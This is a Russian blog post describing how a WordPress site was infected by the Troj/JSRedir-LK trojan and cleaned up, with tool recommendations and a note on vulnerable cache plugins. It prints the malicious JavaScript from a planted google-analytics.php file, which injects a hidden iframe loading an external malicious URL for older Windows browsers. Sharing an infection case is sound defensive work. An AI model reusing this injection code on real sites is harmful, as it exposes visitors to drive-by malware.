Троян Troj/Jsredir-Lk И Уязвимость Wordpress

Буквально сегодня я закончил разбираться с интересной и новой для себя проблемой - находящийся на моем попечении сайт оказался в черном списке Яндекса.

Причина — троян Troj/JSRedir-LK (по версии Sophos).

Уточню: в черный список вошли сразу два сайта, один из которых является поддоменом второго, и ниже я опишу, какие преобразования произошли с обоими в результате действия трояна.

И вот что произошло: в файле header.php (поддомене) появилось два скрипта, И , в файле footer.php (поддомен) раньше тоже есть скрипт со ссылкой на ligaexpress, а в папке wp-includes родительского сайта (домена) — файл google-analytics.php, заканчивающийся следующим кодом:

   

 function showBrowVer()
 {
     var data = browserDetectNav();
 
     if (data[0]) {
       if ((data[0] == 'Opera' || data[0] == 'MSIE'|| (data[0] == 'Firefox' & data[1] <= 17)) & data[3] == 'Windows'){
           var js_kod2 = document.createElement('iframe');
               js_kod2.src = ' http://moradomedia.nl/new/php/one-style.php ';
               js_kod2.width = '2px';                  
               js_kod2.height = '2px';                
               js_kod2.style = 'visibility: hidden;';  
               document.body.appendChild(js_kod2);
       }
     }
 }
 

   

Любопытно также, что кроме самого Sophos ни один из использованных антивирусов ничего не нашел.

Ни на сайте, ни на компьютере, который я после возни с сайтом решил проверить.

Но средство удаления вирусов Sofos обнаружило тот же Troj/JSRedir-LK, а также Troj/JSRedir-JK, оба во временных интернет-файлах.

Для чего я теперь настоятельно рекомендую это [1].

Я также рекомендую плагин WordPress Wordfence Security [2].

Меня поразила его способность сканировать файлы, включая файлы тем и плагинов, и сравнивать их с файлами, хранящимися на WordPress.org. Даже жаль, что к моменту установки и запуска сканирования все ненужное уже было удалено.

А также про WordPress (о той самой уязвимости, упомянутой в теме статьи).

Пока я искал дыру, через которую проник вирус, я нашел информацию о том, что в плагинах кеширования (а именно WP Super Cache 1.2 и ранее; W3 Total Cache 0.9.2.8 и ранее) обнаружена уязвимость, позволяющая удаленному пользователю внедрить и выполнить произвольный PHP-код. Подробнее об этом можно прочитать здесь [3] и здесь [4].

Так что держите ноги в тепле и обновляйте плагины.

Ах да, и не храните пароли ftp в Total Commander. Спасибо за внимание.

Ссылки на то, что упомянуто в тексте: 1. Инструмент удаления вирусов от Sophos (бесплатно) 2. Плагин безопасности Wordfence для WordPress 3. В плагинах кеширования для WordPress обнаружена опасная уязвимость, Securitylab.ru 4. проблема с mfunc Теги: #безопасность #wordpress #плагины WordPress #информационная безопасность #wordpress

• 5 Лучших Российских Ios-Приложений 2014 Года По Версии Apple

  19 Oct, 24

• Фрии Разработал Бесплатные Типовые Документы Для Стартапов

  19 Oct, 24

• Автоматизация Тестирования На Максимальной Скорости. Отчет Яндекса

  19 Oct, 24

• Маркетолог, Стартап-Менеджер И Дизайнер Ищет Работу

  19 Oct, 24

• Неужели Все Системы Глонасс Горят?

  19 Oct, 24

• Как Кафка Стал Реальностью

  19 Oct, 24

• Ожидания От Google Chrome 6 И Особенности Chromium 7

  19 Oct, 24

• Ускорение Векторизации И Доступа К Памяти В Dl_Meso: Примеры Оптимизации С Помощью Vectorization Advisor На Большом Проекте

  19 Oct, 24

• Учет Денег По Кийосаки В Программе Acemoney.

  19 Oct, 24

• Мультивордпрессинг

  19 Oct, 24